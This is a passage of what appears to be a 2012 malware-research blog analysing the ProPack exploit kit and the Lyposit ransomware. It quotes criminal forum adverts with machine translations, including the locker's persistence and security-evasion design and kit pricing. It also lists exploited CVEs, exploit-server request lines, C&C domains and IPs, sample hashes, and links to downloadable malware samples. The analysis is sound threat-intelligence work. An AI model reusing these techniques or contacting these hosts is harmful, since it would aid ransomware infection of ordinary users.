collab - эксплойт под Adobe Reader 6-7 веток
printf - эксплойт под Adobe Reader 7.1.0
mdac - старый добрый эксплойт, все еще дающий пробив на определенном трафике

-Возможность одновременной прогрузки нескольких .exe файлов одному потоку*:
java эксплойты и mdac были специально переписаны для обеспечения данной возможности,
можно грузить хоть 10 экзе одновременно главное чтобы все они успели докачаться

*pdf экспы пока данную возможность не поддерживают

-Многопоточность
лейте трафик в несколько потоков и грузите каждому потоку свой экзе файл/несколько экзе файлов одновременно

-Гибкая система лицензирования
система лицензирования основана на лицензионных ключах, получив ключ на 1 день, неделю, месяц или год вы можете использовать связку
на том сервере на котором данный лицензионный ключ был впервые задействован в течении того срока времени на который был выписан данный лицензионный ключ

-Система автоматических чисток
просто нажмите кнопку ReFUD в админке и для всех потоков связки будут загружены чистые файлы

-Не раскидываемся сплойтами: двойная проверка перед выдачей java (js+uag), проверка версий перед выдачей pdf

ЦЕНЫ:

80$ сутки
480$ в неделю
1800$ в месяц

ТЕСТ:

10к трафика - 20$

ЛИМИТЫ:

150к трафа в день
Большие объемы трафа в день/снятие лимитов обговариваются отдельно

Одновременно на сдачу в аренду доступно только 7 мест.
Ищем постоянных партнеров и по нахождению 7 человек подпадающих под этот критерий - уходим в приват.

Контакты:

ICQ: 646143773
Jabber: propack@neko.im

------------------------------------------
translated by google as :
------------------------------------------

ProPack exploit pack - a professional bunch of rent on your server.

And so, we are pleased to introduce a new product in the market - ProPack exploit pack.

"Everyone chooses for themselves something of his own: who is checkered, and who is going ...
We can not boast of creative design, ease of interface, additional gadgets.
Minimalist in design, high performance and test - the key points on which we focused in creating our product.

The main features of our product:

The highest-performance:
Buffer technology, all-consuming operations are performed in batch mode, the post-processing
use the fastest today SypexGeo instead MaxMind GeoIP to determine the country of the visitor
technology independent threads - no need to introduce an additional parameter, and run on the basis of

High-breaking, due to:
highest performance issue
Small file size and sployty neresursoemkim js Krypto
modern set of exploits:

java aio - java all in one or 3 exploit java atomic, java byte, java 7 in one. jar file (do not forget about the fifth branch of Java)
libtiff - exploit for Adobe Reader 8-9 branches
collab - exploit for Adobe Reader 6-7 branches
printf - an exploit for Adobe Reader 7.1.0
mdac - good old exploit that still gives a certain breaking traffic

-Simultaneous multiple injection test. Exe files one thread *:
java exploits and mdac were specifically rewritten to provide this opportunity
can be loaded at least 10 ekze both the main thing that they all managed to Resume

* Pdf exp while this feature is not supported

-Threading
pour traffic into multiple streams and ship each thread its ekze file / multiple files simultaneously ekze

-Flexible Licensing
licensing system based on license keys, get the key for 1 day, week, month or year, you can use a bunch
on the server upon which the license key was first pressed for a time frame of which was issued this license key

-The system of automatic purge
just click ReFUD in admin and all the threads are loaded bundles clean files

-Do not weep sployty: double check before issuing java (js + uag), version check before issuing a pdf

PRICES:

$ 80 per day
$ 480 per week
$ 1800 per month

TEST:

10k traffic - $ 20

Limit:

150k cores per day
Large amounts of cores per day / withdrawal limits discussed separately

Simultaneously to lease-only 7 seats.
Looking for a permanent partner and to find 7 people fall under this criterion - we leave in private.

Contacts:

ICQ: 646143773
Jabber: propack@neko.im

------------------------------------------

Yesterday it was announced that domain auto-rotation will soon leave test mode for production :



Text:
------------------------------------------
В течении 2-3 дней автосмена будет работать в основном (уже не тестовом) режиме.
------------------------------------------
translated by google (and fixed by @aelsmartin )
------------------------------------------
2-3 days domain-autorotation will operate mainly (not test) mode.
------------------------------------------

And now let's see infection tree...

CVE-2012-5076 Boom...

Announced same week as all others
ProPack announced as incorporating CVE-2012-5076
So...no surprise :
CVE-2012-5076 path on ProPack EP (and Ransomware getting his clothes)


GET http://37.9.53.83/build2/serge/hxkwlqdoky.php 200 OK (text/html)
GET http://37.9.53 .83/build2/serge/hxkwlqdoky.php 200 OK (text/html)
GET http://37.9.53 .83/build2/serge/92fq59.php?j=1&k=1 200 OK (application/octet-stream)





CVE-2012-5076 in the Jar



CVE-2012-4681 Boom...
CVE-2012-4681 positive path and a new  Ransomware design for botnets.fr
( Adneukine looks like a variant of Lyposit )

Out of scope : The Adneukine ransomware 508496feb09432521008902946b33d82
http://dl.dropbox.com/u/106864056/508496FEB09432521008902946B33D82.zip



CVE-2012-4681 in ProPack EP jar


CVE-2012-0507 Boom...

CVE-2012-0507 positive path on ProPack


CVE-2012-1723 (seems safe?)
CVE-2012-1723 looks like an untrapped path on the ProPack

CVE-2010-0188 Boom...
CVE-2012-0188 (AR 9.3.0) in ProPack


Pdf :  32adc9115dedb6e0e9945da2d34f8baa
http://wepawet.iseclab.org/view.php?hash=32adc9115dedb6e0e9945da2d34f8baa&type=js (escaped)


CVE-2006-0003 MDAC Boom...

CVE-2006-0003 MDAC positive path on ProPack

Landing :
One landing code

after some Malzilla manipulation : http://pastebin.com/TKJjfQZf

One ProPack landing deobfuscated
Files:
Just the Jar !

All :
http://dl.dropbox.com/u/106864056/ProPack_5CVE_Paths.zip (compressed with 7z. Public pass)

In the zip

Edit to come : Some more paths if i find time to. Link to Adneukine on botnets.fr

Nice reading :
Java Exploit Code Obfuscation and Antivirus Bypass/Evasion (CVE-2012-4681) - 2012-11-15 - Security Obscurity

References on Exploit Kits ?
Common Exploit Kits 2012 Poster - 2012-11-11 Mila - Contagio
Wild Wild West - 2012-23-10 - Kahu Security
An Overview of Exploit Packs (Update 17) October 12, 2012 - 2012-10-12 Mila - Contagio

More about ProPack :
[ru] ! Underground Forum ! ProPack exploit kit, Обзор by Gooner 2012-10-26



<Edit1 27/11/12 - 09:20: Fixed translation for "автосмена"
Added link to a one month old full review on DamageLabs  thx @alesmartin. />

<Edit2 27/11/12 - 10:20: Ransomware dropped looks like Lyposit variant. Thx @malekal_morte  />

Inside view of Lyposit aka (for its friends) Lucky LOCKER

$
0
0

The Lyposit Ransomware appeared wild in second week of September 3 days after this post :

Lucky LOCKER advert (note the IR )

------------------------------------------
Text of the Advert (click to unfold)
1)Чистый Вин Апи. 

2)Практическая неубиваемость локера, в том числе и через безопасный режим, и даже если грузится с загрузочного диска.

То есть тот же локер от гансты можно отрубить через ctrl+alt+delete )) о уровне можете судить сами...

Смысл в чем что локер делает такие изменения системы - что даже если юзер каким то образом умудриться убить процес - ему прийдеться реинстал винды делать - так как система нормально работать не будет, либо перезагрузиться

и заплатить чек)
3)Я беру 20% от вашей прибыли - вмз или либерти. то есть чеки вы налите Сами. и уже сами переводите мне мой процент.
4) Качественно промо которое постояно изменяется - смотрим конверты и выбираем наиболее оптимальное. страны : IR CH ES AT BE FR GB PL DE DK PT 
формат промо html и USA - основной упор сделан на ней как раз
вообще интересует 3-5 человек с котрыми на постоянке буду работать. продукт может быть изменен по вашим советам и как угодно дописан.

обращаться в джабер joker5139@jabbim.cz

Quote:
Установка
=========
При запуске выполняется установка по следующим направлениям:
1) при достаточных правах (администратор для WinXP, Elevated Integrity Level / Admin для Win Vista+) осуществляется запись в параметр Shell раздела
*****
обеспечения автозапуска как в обычном, так и в безопасном режиме

2) при недостаточных правах осуществляется запись в доступный раздел ***** 

3) в любом случае используется дополнительный автозапуск путем модификации настроек командного процессора (не требуется особых привилегий)
В результате при запуске командного процессора в ходе обычного процесса установки/удаления программ, осуществляется автозапуск


Работа
======

Проверяется наличие файла конфигурации, который представляет из себя архив ZIP с локальной копией страницы для отображения пользователю, в формате ***.
При отсутствии файла, выполняется его запрос из панели управления через технологии BITS и Wininet, что позволяет выполнить обход некоторой части защитного ПО.
Полученный файл распаковывается во временную папку, и выполняется запуск скрипта
В дефолтном примере использованы настройки скрипта, которые разворачивают страницу на весь экран, отключают прокрутку и т.п. При изготовлении специализированных
под страны страниц необходимо использовать аналогичные настройки
Параллельно с запуском страницы с сообщением, выполняется циклическая смена цветового оформления ОС (все элементы черные/красные), отключение визуальных и иных
эффектов, а также сокрытие всех не относящихся к процессу страницы окон. В результате, даже при недостаточных привилегиях, осуществляется существенное затруднение
доступа к элементам интерфейса. Настройки цветового оформления сохраняются лишь до момента выхода пользователя из ОС.

В формате страницы предполагается наличие поля для ввода кода . При их разработке необходимо иметь в виду, что цветовые настройки ОС будут изменены
и для видимости поля и текста необходимо принудительно определить цвет шрифта / фон поля ввода, а также не использовать стандартную кнопку отправки формы (вместо
нее следует использовать изображение).
Скрипт внутри страницы должен выполнить базовую проверку введенного кода (длина, цифры и т.п.) и при положительной проверке - выполнить вывод его через
javascript:alert(); Приложение перехватит появившееся окно, считает код и закроет его.
Полученный код будет отправлен и сохранен на сервере. В случае успешной отправки страница будет заменена на - в котором рекомендуется подготовить
текст о временном отключении блокировки и просьбе осуществить выход из системы / перезагрузку, если она не произойдет ближайшие 10 секунд.
По прошествии 10 секунд страница принудительно закрывается и инициируется процедура выхода пользователя из системы. При недостаточных привилегиях получится
просто пустой экран или экран с некоторыми окнами.
Выход из системы и последующий вход необходимы для автоматического восстановления цветового оформления.
Перед выходом устанавливается специальный флаг, который сигнализирует о необходимости отложения визуальных эффектов блокировки доступа к ОС. При его наличии
приложение в фоновом режиме осуществляет запросы к серверу с интервалом 15 минут для получения информации о результате обработки оператором данных от клиента.
Оператор через админ интерфейс может дать команду на повторное отображение страницы при неверных данных, либо на самоудаление, если проверка данных прошла
успешно.
вообще продукт готовился для себя.

------------------------------------------
translated by google as : (click to unfold)
Our advantages:
1) Net Win Api.
2) Practical indestructibility locker, including a safe mode, and even if the boot from the startup disk.
That is the same locker from gangsta can cut off a ctrl + alt + delete)) on the level you can judge for yourself ...
What is the meaning of that locker makes such changes in the system - even if the user somehow manage to kill the process - he will have to reinstal Windows to do - because the system does not work properly, or reboot
and pay check)
3) I take 20% of your profits - wmz or liberty. that is, checks can nalite themselves. and already I translate my own interest.
4) Qualitatively promo is always changing - see the envelopes and select the most optimal. country: IR CH ES AT BE FR GB PL DE DK PT
html format promotional and USA - the main focus is on her right
3-5 people generally interested with KOTRA on postoyanke will work. product can be changed by your advice and somehow appended.

contact Jaber joker5139@jabbim.cz

Quote:
Installation
=========
When you run you are installing in the following areas:
1) with sufficient privileges (administrator for WinXP, Elevated Integrity Level / Admin for Win Vista +) writes to the parameter section Shell
*****
ensure autorun both in normal and safe mode

2) the failure of the right of the recording available in section *****

3) In any case, the additional auto settings by modifying the shell (no special privileges)
As a result, when you start a shell in the normal course of the installation / removal of software, by auto


Work
======

Checks for a configuration file, which is a ZIP archive with a local copy of a page to display to the user in the format. ***
In the absence of a file, it runs a query from the control panel through the BITS technology and Wininet, that allows you to bypass some of the security software.
The resulting file is extracted to a temporary folder, and you are running a shell script
Example used in the default configuration script that deflect the page on the screen, turn off scrolling, etc. In the manufacture of specialized
under the country pages to use the same settings
In parallel with the launch of the page message, the cyclic change colors of the OS (all the black / red), disabling visual and other
effects, and the secrecy of the process of non-page windows. As a result, even with insufficient privileges, is a significant difficulty
access to user interface elements. Setting color schemes remain only until the user logs out of the OS.

In the format of the page assumes a field to enter the code. In their development must be borne in mind that the color settings of the OS will be changed
and visibility of the field and the text you want to force to identify the font color / background input field, and do not use the standard submit button (instead of
She should use the image.)
Script within the page should perform basic validation code entered (length, numbers, etc.) and with a positive test - run its output through
javascript: alert (); application intercepts the window that appears, according to the code and close it.
The resulting code will be sent to and stored on the server. If successful, the page is submitted will be replaced - which is recommended to prepare
text to temporarily disable blocking and request to implement logout / reboot, if it does not happen the next 10 seconds.
After 10 seconds Page forcibly closed and the procedure is initiated logout. If there is insufficient privileges will
just a blank screen or a screen with several windows.
The output from the system and the subsequent input required for the auto recovery color choices.
Before the release are indicated by a flag that indicates if a pending visual effects to block access to the OS. If available
application in the background, makes a request to the server every 15 minutes to provide information about the result of processing the data from the client.
Operator through the admin interface can give the command to re-display the page with incorrect data, either on samoudalenie if the test data was successfull.
all products are ready for you.

------------------------------------------

What make Lyposit different from others :
- it seems to be the first one to target Denmark,

Lyposit DK (09-2012)

 - it was targeting Irish (IE) people with a poor Iranian (IR) design
 - it was showing images (gathered from the browser cache?) at the bottom of the screen
 - the design downloaded from the C&C was conditioned by the Regionals Settings of the infected computer
 - the Background was blinking from Black to Red

Lyposit Design in September 2012
 (The sample I used to gather design was catched by Malekal and spotted as a new Ransomware by S!ri )

Now we should talk about Ransom Casier but I think you'll get seriously bored so let's move on.

1 week ago :


Text:
------------------------------------------

на днях тестил траф:

USA 2970 ботов
12300$ - монейпака

наберу новых адвертов
3-5 человек.
Основное направление ЮСА

От вас:
от 5к юса ботов в сутки,
скрин статы сплоита на фоне вашей жабы в ПМ. я стукну к вам в джабер.
возможна установка софта полнолстью на ваш сервер. то есть никакого шейва в принципе быть не может.
------------------------------------------
translated by google as 
------------------------------------------
recently testil cores:

USA 2970 bots
$ 12,300 - moneypaka

gathering a new adverts
3-5 people.
The main direction of JSA

From you:
Yusa bots from 5k a day
screen sploita stats against your toad in the PM. I knock to you Jaber.
polnolstyu optional software on your server. that is, no sheyva in principle can not be.
------------------------------------------

3 days after ...here is it, pushed by ProPack :

ProPack pushing Lyposit with a New Design
Named few hours Adneukine by Microsoft and then renamed to Lyposit.B here are the design 


Lyposit.B design in November 2012.
2 new design (US, UK), reuse of Epubb design for FR, PT and DE...and it's still showing
an iranian Flag to people living in Ireland


Panel Title -  v0.2...
they plan a big future it seems.

Not that much to see inside :

LuckyLocker Control Panel v0.2

Lyposit.A
 e2569d952c0c48976c20758fd13e6155 12/09/12
 da9e23912e82eaa865527cdaebef49e5 10/09/12
 c3ae37d3e970e6b7aee99b1c144ca6fc 14/09/12

Lyposit.B :
 e2569d952c0c48976c20758fd13e6155 26/11/12
 6d4dd63d0290b83c1f8cbd40b368b349 27/11/12
 c33987e0a9043f33dae133d2586b0253 27/11/12

Some C&C Call :
Lyposit.A:
  windowsonlypositives .org GET /ad/?eaisx=Somebase64encodedData 91.218.231.196 -  12/09/12
  orp-pro.org  GET /ad/?vzos=Somebase64encodedData 46.254.19.102 -- 14/09/12
Lyposit.B :
 neufbem9jefnike .com GET /ad/?ck=Somebase64encodedData  37.143.12.145 -- 26/11/12
 kiribati91 .org GET /ad/?sshe=Somebase64encodedData  37.143.12.145 -- 27/11/12
Viewing all 185 articles
Browse latest View live